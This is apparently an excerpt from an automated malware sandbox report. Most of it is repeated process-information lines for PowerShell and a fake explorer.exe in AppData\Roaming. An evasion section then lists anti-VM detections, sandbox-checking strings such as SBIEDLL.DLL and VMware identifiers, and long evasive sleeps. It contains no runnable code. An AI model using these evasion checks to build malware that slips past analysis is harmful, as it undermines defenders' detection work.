Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 Thread sleep time: -720000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1484 Thread sleep time: -41226s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2452 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 808 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1256 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2868 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 804 Thread sleep count: 8031 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 Thread sleep time: -660000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 412 Thread sleep time: -41226s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 236 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 152 Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1224 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 852 Thread sleep count: 60 > 30
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\explorer.exe Window / User API: threadDelayed 9399 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Window / User API: threadDelayed 8031 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Window / User API: threadDelayed 6595
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 41226 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 41226 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 41226
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000002.1030166755.000000000087D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware_S
Source: explorer.exe, 0000001D.00000002.1030821479.00000000008E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
